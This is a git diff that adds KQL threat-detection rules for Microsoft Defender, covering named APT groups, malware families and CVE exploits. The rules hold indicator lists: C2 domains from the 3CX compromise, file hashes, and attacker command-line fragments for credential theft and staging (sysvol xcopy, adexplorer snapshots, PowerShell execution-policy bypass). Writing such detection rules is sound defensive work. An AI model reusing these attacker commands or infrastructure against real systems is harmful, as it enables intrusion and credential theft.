+DeviceNetworkEvents +| where (RemoteUrl contains "akamaicontainer.com" or RemoteUrl contains "akamaitechcloudservices.com" or RemoteUrl contains "azuredeploystore.com" or RemoteUrl contains "azureonlinecloud.com" or RemoteUrl contains "azureonlinestorage.com" or RemoteUrl contains "dunamistrd.com" or RemoteUrl contains "glcloudservice.com" or RemoteUrl contains "journalide.org" or RemoteUrl contains "msedgepackageinfo.com" or RemoteUrl contains "msstorageazure.com" or RemoteUrl contains "msstorageboxes.com" or RemoteUrl contains "officeaddons.com" or RemoteUrl contains "officestoragebox.com" or RemoteUrl contains "pbxcloudeservices.com" or RemoteUrl contains "pbxphonenetwork.com" or RemoteUrl contains "pbxsources.com" or RemoteUrl contains "qwepoi123098.com" or RemoteUrl contains "sbmsa.wiki" or RemoteUrl contains "sourceslabs.com" or RemoteUrl contains "visualstudiofactory.com" or RemoteUrl contains "zacharryblogs.com") and InitiatingProcessFolderPath endswith "\\3CXDesktopApp.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Command and Control/potential_csharp_streamer_rat_loading_net_executable_image.kql b/KQL/rules-emerging-threats/Command and Control/potential_csharp_streamer_rat_loading_net_executable_image.kql new file mode 100644 index 00000000..0a5e25ac --- /dev/null +++ b/KQL/rules-emerging-threats/Command and Control/potential_csharp_streamer_rat_loading_net_executable_image.kql @@ -0,0 +1,11 @@ +// Title: Potential CSharp Streamer RAT Loading .NET Executable Image +// Author: Luca Di Bartolomeo +// Date: 2024-06-22 +// Level: high +// Description: Detects potential CSharp Streamer RAT loading .NET executable image by using the default file name and path associated with the tool. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002, detection.emerging-threats + +DeviceImageLoadEvents +| where FolderPath matches regex "\\\\AppData\\\\Local\\\\Temp\\\\dat[0-9A-Z]{4}\\.tmp" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Command and Control/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql b/KQL/rules-emerging-threats/Command and Control/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql new file mode 100644 index 00000000..e47bc5f3 --- /dev/null +++ b/KQL/rules-emerging-threats/Command and Control/potential_exploitation_of_rce_vulnerability_cve_2025_33053_image_load.kql @@ -0,0 +1,13 @@ +// Title: Potential Exploitation of RCE Vulnerability CVE-2025-33053 - Image Load +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-06-13 +// Level: high +// Description: Detects potential exploitation of remote code execution vulnerability CVE-2025-33053 +by monitoring suspicious image loads from WebDAV paths. The exploit involves malicious executables from +attacker-controlled WebDAV servers loading the Windows system DLLs like gdi32.dll, netapi32.dll, etc. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.execution, attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1105, detection.emerging-threats, cve.2025-33053 + +DeviceImageLoadEvents +| where (InitiatingProcessFolderPath endswith "\\route.exe" or InitiatingProcessFolderPath endswith "\\netsh.exe" or InitiatingProcessFolderPath endswith "\\makecab.exe" or InitiatingProcessFolderPath endswith "\\dxdiag.exe" or InitiatingProcessFolderPath endswith "\\ipconfig.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe") and (InitiatingProcessFolderPath contains "\\DavWWWRoot\\" and InitiatingProcessFolderPath startswith "\\\\") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Command and Control/potential_pikabot_c2_activity.kql b/KQL/rules-emerging-threats/Command and Control/potential_pikabot_c2_activity.kql new file mode 100644 index 00000000..80fa7bfe --- /dev/null +++ b/KQL/rules-emerging-threats/Command and Control/potential_pikabot_c2_activity.kql @@ -0,0 +1,14 @@ +// Title: Potential Pikabot C2 Activity +// Author: Andreas Braathen (mnemonic.io) +// Date: 2023-10-27 +// Level: high +// Description: Detects the execution of rundll32 that leads to an external network connection. +The malware Pikabot has been seen to use this technique to initiate C2-communication through hard-coded Windows binaries. + +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1573, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceNetworkEvents +| where (InitiatingProcessFolderPath endswith "\\SearchFilterHost.exe" or InitiatingProcessFolderPath endswith "\\SearchProtocolHost.exe" or InitiatingProcessFolderPath endswith "\\sndvol.exe" or InitiatingProcessFolderPath endswith "\\wermgr.exe" or InitiatingProcessFolderPath endswith "\\wwahost.exe") and InitiatingProcessParentFileName =~ "rundll32.exe" and Protocol =~ "tcp" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Command and Control/potential_suspicious_child_process_of_3cxdesktopapp.kql b/KQL/rules-emerging-threats/Command and Control/potential_suspicious_child_process_of_3cxdesktopapp.kql new file mode 100644 index 00000000..2f1ab35c --- /dev/null +++ b/KQL/rules-emerging-threats/Command and Control/potential_suspicious_child_process_of_3cxdesktopapp.kql @@ -0,0 +1,10 @@ +// Title: Potential Suspicious Child Process Of 3CXDesktopApp +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-29 +// Level: high +// Description: Detects potential suspicious child processes of "3CXDesktopApp.exe". Which could be related to the 3CXDesktopApp supply chain compromise +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.execution, attack.defense-evasion, attack.t1218, detection.emerging-threats + +DeviceProcessEvents +| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\3CXDesktopApp.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Credential Access/gallium_iocs.kql b/KQL/rules-emerging-threats/Credential Access/gallium_iocs.kql new file mode 100644 index 00000000..e22882e2 --- /dev/null +++ b/KQL/rules-emerging-threats/Credential Access/gallium_iocs.kql @@ -0,0 +1,10 @@ +// Title: GALLIUM IOCs +// Author: Tim Burrell +// Date: 2020-02-07 +// Level: high +// Description: Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.command-and-control, attack.t1212, attack.t1071, attack.g0093, detection.emerging-threats + +DeviceProcessEvents +| where (SHA256 startswith "9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd" or SHA256 startswith "7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b" or SHA256 startswith "657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5" or SHA256 startswith "2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29" or SHA256 startswith "52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77" or SHA256 startswith "a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3" or SHA256 startswith "5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022" or SHA256 startswith "6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883" or SHA256 startswith "3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e" or SHA256 startswith "1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7" or SHA256 startswith "fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1" or SHA256 startswith "7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c" or SHA256 startswith "178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945" or SHA256 startswith "51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9" or SHA256 startswith "889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79" or SHA256 startswith "332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf" or SHA256 startswith "44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08" or SHA256 startswith "63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef" or SHA256 startswith "056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070") or (SHA1 startswith "53a44c2396d15c3a03723fa5e5db54cafd527635" or SHA1 startswith "9c5e496921e3bc882dc40694f1dcc3746a75db19" or SHA1 startswith "aeb573accfd95758550cf30bf04f389a92922844" or SHA1 startswith "79ef78a797403a4ed1a616c68e07fff868a8650a" or SHA1 startswith "4f6f38b4cec35e895d91c052b1f5a83d665c2196" or SHA1 startswith "1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d" or SHA1 startswith "e841a63e47361a572db9a7334af459ddca11347a" or SHA1 startswith "c28f606df28a9bc8df75a4d5e5837fc5522dd34d" or SHA1 startswith "2e94b305d6812a9f96e6781c888e48c7fb157b6b" or SHA1 startswith "dd44133716b8a241957b912fa6a02efde3ce3025" or SHA1 startswith "8793bf166cb89eb55f0593404e4e933ab605e803" or SHA1 startswith "a39b57032dbb2335499a51e13470a7cd5d86b138" or SHA1 startswith "41cc2b15c662bc001c0eb92f6cc222934f0beeea" or SHA1 startswith "d209430d6af54792371174e70e27dd11d3def7a7" or SHA1 startswith "1c6452026c56efd2c94cea7e0f671eb55515edb0" or SHA1 startswith "c6b41d3afdcdcaf9f442bbe772f5da871801fd5a" or SHA1 startswith "4923d460e22fbbf165bbbaba168e5a46b8157d9f" or SHA1 startswith "f201504bd96e81d0d350c3a8332593ee1c9e09de" or SHA1 startswith "ddd2db1127632a2a52943a2fe516a2e7d05d70d2") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Credential Access/potential_russian_apt_credential_theft_activity.kql b/KQL/rules-emerging-threats/Credential Access/potential_russian_apt_credential_theft_activity.kql new file mode 100644 index 00000000..5e586028 --- /dev/null +++ b/KQL/rules-emerging-threats/Credential Access/potential_russian_apt_credential_theft_activity.kql @@ -0,0 +1,12 @@ +// Title: Potential Russian APT Credential Theft Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2019-02-21 +// Level: critical +// Description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.001, attack.t1003.003, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "adexplorer -snapshot \"\" c:\\users\\" and ProcessCommandLine contains "\\downloads\\" and ProcessCommandLine contains ".snp") or (ProcessCommandLine contains "xcopy /S /E /C /Q /H \\\\" and ProcessCommandLine contains "\\sysvol\\") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Credential Access/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql b/KQL/rules-emerging-threats/Credential Access/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql new file mode 100644 index 00000000..03825d48 --- /dev/null +++ b/KQL/rules-emerging-threats/Credential Access/suspicious_creation_of_library_ms_file_potential_cve_2025_24054_exploit.kql @@ -0,0 +1,15 @@ +// Title: Suspicious Creation of .library-ms File — Potential CVE-2025-24054 Exploit +// Author: Gene Kazimiarovich +// Date: 2025-04-20 +// Level: medium +// Description: Detects creation of '.library-ms' files, which may indicate exploitation of CVE-2025-24054. This vulnerability allows an attacker to trigger an automatic outbound SMB or WebDAV authentication request to a remote server upon archive extraction. +If the system is unpatched, no user interaction is required beyond extracting a malicious archive—potentially exposing the user's NTLMv2-SSP hash to the attacker. + +// MITRE Tactic: Credential Access +// Tags: detection.emerging-threats, attack.credential-access, attack.t1187, cve.2025-24054 +// False Positives: +// - Legitimate Library shortcuts under %APPDATA%\Microsoft\Windows\Libraries\ (rarely created by end-users) +// - Custom corporate scripts that programmatically generate .library-ms Files + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith "\\7z.exe" or InitiatingProcessFolderPath endswith "\\winrar.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe") and FolderPath endswith ".library-ms" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_commandline_indicators.kql b/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_commandline_indicators.kql new file mode 100644 index 00000000..d120fd91 --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_commandline_indicators.kql @@ -0,0 +1,12 @@ +// Title: APT29 2018 Phishing Campaign CommandLine Indicators +// Author: Florian Roth (Nextron Systems), @41thexplorer +// Date: 2018-11-20 +// Level: critical +// Description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218.011, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "-noni -ep bypass $" or (ProcessCommandLine contains "cyzfc.dat," and ProcessCommandLine contains "PointFunctionCall") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_file_indicators.kql b/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_file_indicators.kql new file mode 100644 index 00000000..c6dc5a5b --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/apt29_2018_phishing_campaign_file_indicators.kql @@ -0,0 +1,12 @@ +// Title: APT29 2018 Phishing Campaign File Indicators +// Author: @41thexplorer +// Date: 2018-11-20 +// Level: critical +// Description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents +| where FolderPath contains "ds7002.lnk" or FolderPath contains "ds7002.pdf" or FolderPath contains "ds7002.zip" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/apt_privatelog_image_load_pattern.kql b/KQL/rules-emerging-threats/Defense Evasion/apt_privatelog_image_load_pattern.kql new file mode 100644 index 00000000..dc1d9e6f --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/apt_privatelog_image_load_pattern.kql @@ -0,0 +1,12 @@ +// Title: APT PRIVATELOG Image Load Pattern +// Author: Florian Roth (Nextron Systems) +// Date: 2021-09-07 +// Level: high +// Description: Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055, detection.emerging-threats +// False Positives: +// - Rarely observed + +DeviceImageLoadEvents +| where FolderPath endswith "\\clfsw32.dll" and InitiatingProcessFolderPath endswith "\\svchost.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/blue_mockingbird_registry.kql b/KQL/rules-emerging-threats/Defense Evasion/blue_mockingbird_registry.kql new file mode 100644 index 00000000..f34a9bcb --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/blue_mockingbird_registry.kql @@ -0,0 +1,10 @@ +// Title: Blue Mockingbird - Registry +// Author: Trent Liffick (@tliffick) +// Date: 2020-05-14 +// Level: high +// Description: Attempts to detect system changes made by Blue Mockingbird +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.persistence, attack.t1112, attack.t1047, detection.emerging-threats + +DeviceRegistryEvents +| where RegistryKey endswith "\\CurrentControlSet\\Services\\wercplsupport\\Parameters\\ServiceDll" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_dll_sideloading_indicators.kql b/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_dll_sideloading_indicators.kql new file mode 100644 index 00000000..abe0487c --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_dll_sideloading_indicators.kql @@ -0,0 +1,12 @@ +// Title: Diamond Sleet APT DLL Sideloading Indicators +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-24 +// Level: high +// Description: Detects DLL sideloading activity seen used by Diamond Sleet APT +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceImageLoadEvents +| where (FolderPath endswith ":\\ProgramData\\Version.dll" and InitiatingProcessFolderPath endswith ":\\ProgramData\\clip.exe") or (FolderPath endswith ":\\ProgramData\\DSROLE.dll" and InitiatingProcessFolderPath endswith ":\\ProgramData\\wsmprovhost.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_scheduled_task_creation_registry.kql b/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_scheduled_task_creation_registry.kql new file mode 100644 index 00000000..692bb84b --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_scheduled_task_creation_registry.kql @@ -0,0 +1,11 @@ +// Title: Diamond Sleet APT Scheduled Task Creation - Registry +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-24 +// Level: high +// Description: Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562, detection.emerging-threats + +DeviceRegistryEvents +| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "Windows TeamCity Settings User Interface" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/dll_names_used_by_svr_for_graphicalproton_backdoor.kql b/KQL/rules-emerging-threats/Defense Evasion/dll_names_used_by_svr_for_graphicalproton_backdoor.kql new file mode 100644 index 00000000..7c11ad3e --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/dll_names_used_by_svr_for_graphicalproton_backdoor.kql @@ -0,0 +1,10 @@ +// Title: DLL Names Used By SVR For GraphicalProton Backdoor +// Author: CISA +// Date: 2023-12-18 +// Level: medium +// Description: Hunts known SVR-specific DLL names. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001, detection.emerging-threats + +DeviceImageLoadEvents +| where FolderPath endswith "\\AclNumsInvertHost.dll" or FolderPath endswith "\\AddressResourcesSpec.dll" or FolderPath endswith "\\BlendMonitorStringBuild.dll" or FolderPath endswith "\\ChildPaletteConnected.dll" or FolderPath endswith "\\DeregisterSeekUsers.dll" or FolderPath endswith "\\HandleFrequencyAll.dll" or FolderPath endswith "\\HardSwapColor.dll" or FolderPath endswith "\\LengthInMemoryActivate.dll" or FolderPath endswith "\\ModeBitmapNumericAnimate.dll" or FolderPath endswith "\\ModeFolderSignMove.dll" or FolderPath endswith "\\ParametersNamesPopup.dll" or FolderPath endswith "\\PerformanceCaptionApi.dll" or FolderPath endswith "\\ScrollbarHandleGet.dll" or FolderPath endswith "\\UnregisterAncestorAppendAuto.dll" or FolderPath endswith "\\WowIcmpRemoveReg.dll" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/equation_group_dll_u_export_function_load.kql b/KQL/rules-emerging-threats/Defense Evasion/equation_group_dll_u_export_function_load.kql new file mode 100644 index 00000000..df167168 --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/equation_group_dll_u_export_function_load.kql @@ -0,0 +1,12 @@ +// Title: Equation Group DLL_U Export Function Load +// Author: Florian Roth (Nextron Systems) +// Date: 2019-03-04 +// Level: critical +// Description: Detects a specific export function name used by one of EquationGroup tools +// MITRE Tactic: Defense Evasion +// Tags: attack.g0020, attack.defense-evasion, attack.t1218.011, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "-export dll_u" or (ProcessCommandLine endswith ",dll_u" or ProcessCommandLine endswith " dll_u") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql b/KQL/rules-emerging-threats/Defense Evasion/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql new file mode 100644 index 00000000..cd9f3032 --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql @@ -0,0 +1,10 @@ +// Title: EvilNum APT Golden Chickens Deployment Via OCX Files +// Author: Florian Roth (Nextron Systems) +// Date: 2020-07-10 +// Level: critical +// Description: Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats + +DeviceProcessEvents +| where ProcessCommandLine contains "regsvr32" and ProcessCommandLine contains "/s" and ProcessCommandLine contains "/i" and ProcessCommandLine contains "\\AppData\\Roaming\\" and ProcessCommandLine contains ".ocx" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/exploit_for_cve_2015_1641.kql b/KQL/rules-emerging-threats/Defense Evasion/exploit_for_cve_2015_1641.kql new file mode 100644 index 00000000..e4f65936 --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/exploit_for_cve_2015_1641.kql @@ -0,0 +1,10 @@ +// Title: Exploit for CVE-2015-1641 +// Author: Florian Roth (Nextron Systems) +// Date: 2018-02-22 +// Level: critical +// Description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641 +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.005, cve.2015-1641, detection.emerging-threats + +DeviceProcessEvents +| where FolderPath endswith "\\MicroScMgmt.exe" and InitiatingProcessFolderPath endswith "\\WINWORD.EXE" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/flowcloud_registry_markers.kql b/KQL/rules-emerging-threats/Defense Evasion/flowcloud_registry_markers.kql new file mode 100644 index 00000000..7a0c8949 --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/flowcloud_registry_markers.kql @@ -0,0 +1,14 @@ +// Title: FlowCloud Registry Markers +// Author: NVISO +// Date: 2020-06-09 +// Level: critical +// Description: Detects FlowCloud malware registry markers from threat group TA410. +The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1112, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where RegistryKey contains "\\HARDWARE\\{2DB80286-1784-48b5-A751-B6ED1F490303}" or RegistryKey contains "\\HARDWARE\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}" or RegistryKey contains "\\HARDWARE\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}" or RegistryKey endswith "\\SYSTEM\\Setup\\PrintResponsor*" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_file_creation_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_file_creation_activity.kql new file mode 100644 index 00000000..60558d63 --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_file_creation_activity.kql @@ -0,0 +1,14 @@ +// Title: Forest Blizzard APT - File Creation Activity +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-04-23 +// Level: high +// Description: Detects the creation of specific files inside of ProgramData directory. +These files were seen being created by Forest Blizzard as described by MSFT. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.002, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents +| where ((FolderPath contains "\\prnms003.inf_" or FolderPath contains "\\prnms009.inf_") and (FolderPath startswith "C:\\ProgramData\\Microsoft\\v" or FolderPath startswith "C:\\ProgramData\\Adobe\\v" or FolderPath startswith "C:\\ProgramData\\Comms\\v" or FolderPath startswith "C:\\ProgramData\\Intel\\v" or FolderPath startswith "C:\\ProgramData\\Kaspersky Lab\\v" or FolderPath startswith "C:\\ProgramData\\Bitdefender\\v" or FolderPath startswith "C:\\ProgramData\\ESET\\v" or FolderPath startswith "C:\\ProgramData\\NVIDIA\\v" or FolderPath startswith "C:\\ProgramData\\UbiSoft\\v" or FolderPath startswith "C:\\ProgramData\\Steam\\v")) or (FolderPath startswith "C:\\ProgramData\\" and ((FolderPath endswith ".save" or FolderPath endswith "\\doit.bat" or FolderPath endswith "\\execute.bat" or FolderPath endswith "\\servtask.bat") or (FolderPath contains "\\wayzgoose" and FolderPath endswith ".dll"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_javascript_constrained_file_creation.kql b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_javascript_constrained_file_creation.kql new file mode 100644 index 00000000..14293f5b --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_javascript_constrained_file_creation.kql @@ -0,0 +1,14 @@ +// Title: Forest Blizzard APT - JavaScript Constrained File Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-04-23 +// Level: medium +// Description: Detects the creation of JavaScript files inside of the DriverStore directory. +Forest Blizzard used this to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.002, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents +| where FolderPath endswith "\\.js" and FolderPath startswith "C:\\Windows\\System32\\DriverStore\\FileRepository\\" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_process_creation_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_process_creation_activity.kql new file mode 100644 index 00000000..4ffc2e1e --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_process_creation_activity.kql @@ -0,0 +1,12 @@ +// Title: Forest Blizzard APT - Process Creation Activity +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-04-23 +// Level: high +// Description: Detects the execution of specific processes and command line combination. +These were seen being created by Forest Blizzard as described by MSFT. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats + +DeviceProcessEvents +| where (SHA256 startswith "6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f" or SHA256 startswith "c60ead92cd376b689d1b4450f2578b36ea0bf64f3963cfa5546279fa4424c2a5") or (ProcessCommandLine contains "Get-ChildItem" and ProcessCommandLine contains ".save" and ProcessCommandLine contains "Compress-Archive -DestinationPath C:\\ProgramData\\") or ((ProcessCommandLine contains "servtask.bat" or ProcessCommandLine contains "execute.bat" or ProcessCommandLine contains "doit.bat") and (ProcessCommandLine contains "Create" and ProcessCommandLine contains "/RU" and ProcessCommandLine contains "SYSTEM" and ProcessCommandLine contains "\\Microsoft\\Windows\\WinSrv") and FolderPath endswith "\\schtasks.exe") or ((ProcessCommandLine contains "Delete" and ProcessCommandLine contains "/F " and ProcessCommandLine contains "\\Microsoft\\Windows\\WinSrv") and FolderPath endswith "\\schtasks.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql b/KQL/rules-emerging-threats/Defense Evasion/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql new file mode 100644 index 00000000..60139c6e --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql @@ -0,0 +1,10 @@ +// Title: IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32 +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-31 +// Level: high +// Description: Detects RunDLL32.exe executing a single digit DLL named "1.dll" with the export function "DllRegisterServer". This behaviour was often seen used by malware and especially IcedID +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine endswith "\\1.dll, DllRegisterServer" or ProcessCommandLine endswith " 1.dll, DllRegisterServer") and FolderPath endswith "\\rundll32.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/kapeka_backdoor_execution_via_rundll32_exe.kql b/KQL/rules-emerging-threats/Defense Evasion/kapeka_backdoor_execution_via_rundll32_exe.kql new file mode 100644 index 00000000..a98cb4ca --- /dev/null +++ b/KQL/rules-emerging-threats/Defense Evasion/kapeka_backdoor_execution_via_rundll32_exe.kql @@ -0,0 +1,11 @@ +// Title: Kapeka Backdoor Execution Via RunDLL32.EXE +// Author: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-07-03 +// Level: high +// Description: Detects Kapeka backdoor process execution pattern, where the dropper launch the backdoor binary by calling rundll32 and passing the backdoor's first export ordinal (#1) with a "-d" argument. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats + +DeviceProcessEvents +| where (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and (ProcessCommandLine contains ":\\ProgramData" or ProcessCommandLine contains "\\AppData\\Local") and ((ProcessCommandLine contains ".wll" and ProcessCommandLine contains "#1" and ProcessCommandLine contains " -d") or (ProcessCommandLine contains ".wll" and ProcessCommandLine endswith "#1")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Defense Evasion/lazarus_apt_dll_sideloading_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/lazarus_apt_dll_sideloading_activity.kql new file mode 100644 index 00000000..63635772 --- /dev/null +++ 